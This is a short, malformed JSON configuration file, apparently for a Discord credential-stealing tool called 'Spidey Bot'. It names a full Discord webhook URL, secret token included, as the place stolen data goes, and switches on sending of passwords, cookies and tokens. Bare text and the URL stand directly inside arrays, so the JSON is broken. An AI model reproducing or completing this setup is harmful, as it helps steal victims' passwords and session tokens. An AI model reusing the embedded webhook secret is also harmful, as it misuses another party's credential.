{
    "Title_Configs":[polifys 
        {

           "name": "polify",
           "servername": "polify's server",
           "program": "python"

        }
    ],

    "Webhook_config":[https://discord.com/api/webhooks/1058262577911709716/3rTrAwHWjqCBQ0U9zwJ-K1GzJnUIse17NQTXBIeHN1j1ecE4mNMDVnaBJcmgs6WN1yES
        {

          "Bot_Name": "Spidey Bot",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "Delay": 0,
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": "True"
        }
    ]




}
